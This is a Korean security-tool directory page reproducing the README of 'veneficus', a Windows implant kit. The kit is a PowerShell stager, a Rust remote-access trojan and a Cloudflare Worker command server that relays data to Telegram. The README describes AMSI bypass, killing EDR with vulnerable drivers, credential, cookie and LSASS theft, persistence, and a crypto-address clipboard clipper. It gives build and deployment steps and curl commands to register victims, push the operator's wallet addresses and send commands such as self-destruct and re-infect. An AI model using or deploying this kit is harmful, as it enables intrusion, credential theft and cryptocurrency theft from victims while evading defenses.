Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/abraxas/veneficus
Privilege EscalationPersistence MechanismsIDS/IPS EvasionLateral MovementData ExfiltrationPost-ExploitationMalware AnalysisCommand and ControlRed TeamingPayload DevelopmentRemote Access Trojan
2181개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
abraxas/veneficus

veneficus

초정예 엔드투엔드 임플란트 0day. 전체 킬체인. 익스플로잇, 권한 상승, 피벗, 포이즌, 지속성.

저장소 보기

ABRAXAS LABS — analyze · reverse · disclose

@abraxas_null · [email protected] · abraxaslabs.tech · github.com/abraxas/veneficus
Credit: @YoSoth0

Veneficus Mini v3.0

Windows 10/11 x64 임플란트 키트: PowerShell 스테이저, Rust PE, 그리고 Telegram으로 운영자에게 알림을 보내는 Cloudflare Worker로 구성된다.

스테이저(resources/loader.ps1)는 현재 PowerShell 프로세스에서 AMSI를 조용히 비활성화하고, Worker의 /beacon 라우트에서 임플란트를 가져와 %TEMP%\MicrosoftEdgeUpdate.exe로 실행하는 역할을 한다. 그런 다음 PE는 호스트를 샌드박스/분석가 아티팩트 기준으로 점수화한다. 점수가 높으면 바이너리를 삭제하고, 중간이면 "안전 모드"(지문 수집만)로 진입하며, 낮으면 전체 스택을 실행한다 — AMSI/ETW 패치, 지정된 EDR 프로세스에 대한 BYOVD 풀, 브라우저 자격 증명 탈취, LSASS 덤프 체인, WMI/예약 작업/실행(Run) 지속성, localhost SOCKS5 프록시, localhost HVNC/RFB 리스너, 그리고 암호화폐 주소용 클립보드 클리퍼. 지터가 적용된 HTTPS 루프가 비컨을 보내고 소규모 명령 세트(/status, /proxy_on, /self_destruct, /re_infect, /sleep, 안전 모드 토글)를 폴링한다. 유출은 컴파일 시점에 박힌 UUID에서 파생된 키로 AES-256-GCM과 HMAC을 사용하며, Worker는 키를 보유하지 않고 암호문만 전달하도록 되어 있다.

이 저장소는 교육 및 분석 목적으로 공개된다. 구현된 것과 스텁으로 남은 것을 파일별로 정리한 내용은 VENEFICUS_MINI_v3_DEEP_ANALYSIS.md에서 확인할 수 있다.

교육 목적으로만 제공된다. 2026 All rights reversed.


아키텍처

VICTIM MACHINE
  loader.ps1 (AMSI/ETW bypass → download → execute)
    └── veneficus_mini.exe
          ├── Environment assessment (sandbox/VM/analyst detection)
          ├── Stealth: syscall bypass chain, lacuna stack-spoof, DKOM, AMSI/ETW patch
          ├── BYOVD: kill EDR processes (K7RKScan, ThrottleStop, BdApi, TrueSight, wsftprm, RTCore64)
          ├── Payload: creds, cookies, LSASS dump, device fingerprint
          ├── Persistence: WMI / Scheduled Task / Registry (three-way fallback)
          ├── SOCKS5 proxy (127.0.0.1:1080 by default, configurable)
          ├── HVNC (127.0.0.1:5900 by default, configurable)
          ├── Clipper: crypto address hijacking (BTC, ETH, LTC, XMR, DOGE, SOL, XRP, BNB, USDT)
          └── C2 loop: AES-GCM encrypted poll every 10 ± 3s (safe mode: 60 ± 18s)
                ↕ HTTPS
CLOUDFLARE WORKER
  /beacon   → implant download
  /exfil    → receive encrypted data → forward ciphertext to Telegram
  /commands → return queued commands (one-time queue)
  /config   → return operator config blob
  /admin    → queue commands  (requires X-Admin-Key)
  /register → register UUID   (requires X-Admin-Key)
  /unregister → revoke UUID   (requires X-Admin-Key)
  /listing  → list all UUIDs (requires X-Admin-Key)
  /set_config → push config  (requires X-Admin-Key)
                ↓
TELEGRAM BOT
  Receives: ciphertext + nonce + HMAC (operator decrypts offline)

사전 요구 사항

구성 요소설치 방법
Rust + cargocurl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
Windows 크로스 컴파일 타깃rustup target add x86_64-pc-windows-gnu
MinGW 크로스 링커sudo apt install mingw-w64
Wrangler (CF Worker CLI)npm install -g wrangler

설정

1. Cloudflare Worker

wrangler login
wrangler init veneficus-relay
# Replace worker.js with cloudflare/worker.js

wrangler secret put TELEGRAM_TOKEN     # from @BotFather
wrangler secret put TELEGRAM_CHAT_ID   # your chat/group ID
wrangler secret put ADMIN_KEY          # random 32-char secret

wrangler kv:namespace create "UUID_KV"
wrangler kv:namespace create "COMMANDS_KV"
wrangler kv:namespace create "CONFIG_KV"

# Add KV bindings to wrangler.toml:
#   [[kv_namespaces]]
#   binding = "UUID_KV"
#   id = "<uuid_kv_id>"
#   (repeat for COMMANDS_KV, CONFIG_KV)

wrangler deploy

2. 릴레이 URL 생성

import base64
url = b"https://your-worker.workers.dev"
key = 0xAF
enc = bytes([b ^ key for b in url])
print(base64.b64encode(enc).decode())   # → set as RELAY_URL_BYTES

3. 빌드

RELAY_URL_BYTES="<output_above>" \
BYOVD_DRIVER_DIR="./drivers" \
TOOLS_DIR="./tools" \
cargo build --release --target x86_64-pc-windows-gnu

빌드 전에 취약한 드라이버 .sys 파일을 drivers/에, 도구 바이너리를 tools/에 배치한다.

4. 임플란트 UUID 등록

바이너리에서 UUID를 읽는다(빌드 시점에 박힘):

strings target/x86_64-pc-windows-gnu/release/veneficus_mini.exe | grep -E "[0-9a-f]{8}-[0-9a-f]{4}"

관리자 API를 통해 등록:

curl -X POST https://your-worker.workers.dev/register \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{"implant_uuid":"<uuid>","note":"op_blackbird_host01"}'

5. 운영자 설정 푸시 (클리퍼 주소 등)

curl -X POST https://your-worker.workers.dev/set_config \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "implant_uuid": "global",
    "config": {
      "clipper_addresses": {
        "bitcoin":  "bc1qyourwallethere",
        "ethereum": "0xYOURWALLETHERE"
      },
      "reinfect_url": "https://your-worker.workers.dev/beacon"
    }
  }'

C2 명령

/admin 엔드포인트를 통해 전송:

curl -X POST https://your-worker.workers.dev/admin \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{"implant_uuid":"<uuid>","command":"/status"}'
명령효과
/self_destruct3회 덮어쓰기 + 이벤트 로그 삭제 + 종료
/re_infect설정의 reinfect_url에서 새 페이로드를 다운로드하여 자신을 교체
/statusPID, 프록시 상태, 안전 모드, UUID를 C2로 전송
/proxy_onSOCKS5 프록시 활성화
/proxy_offSOCKS5 프록시 비활성화
/exit_safe안전 모드 종료, 전체 동작 재개
/enter_safe안전 모드 진입(지문 수집만)
/sleep <secs>기본 C2 폴링 간격 재정의

폴백 체인

모듈체인 (왼쪽 = 먼저 시도)
BYOVDK7RKScan → BdApiUtil64 → TrueSight → ThrottleStop → STProcessMonitor → wsftprm → RTCore64 → capcom → disable blocklist
LSASSMiniDumpWriteDump (native) → WDigest patch → LSA Whisperer → DumpGuard → PPL bypass (RTCore64)
NTLMPrinterBug → PetitPotam → cross-protocol relay (HTTP→LDAP) → CVE-2025-33073 → MSSQL relay
SyscallsTartarus Gate → Halo's Gate → ntdll unhook → indirect → standard WinAPI
DKOMEPROCESS unlink → PspChained enumeration → EDR callback unregister
PersistenceWMI subscription → Scheduled Task → HKLM Run key

디렉터리 구조

도구 다운로드